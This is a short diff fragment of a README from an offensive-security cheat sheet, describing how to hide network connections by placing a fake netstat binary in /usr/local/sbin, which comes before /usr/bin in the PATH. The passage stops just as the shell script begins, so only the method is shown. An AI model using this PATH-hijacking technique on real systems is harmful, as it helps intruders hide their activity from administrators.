hackerschoice/thc-tips-tricks-hacks-cheat-sheet/README.md

 **Method 2 - Hiding a connection with a binary in $PATH**

-Hide a fake netstat binary in /usr/local/sbin whereas the real netstat is in /usr/bin.
+Create a fake netstat binary in /usr/local/sbin.
 On a default Debian (and most Linux) the PATH variables (`echo $PATH`) lists /usr/local/sbin _before_ /usr/bin.
 This means that our hijacking binary /usr/local/sbin/netstat will be executed instead of /usr/bin/netstat.

 ```shell
 echo -e "#! /bin/bash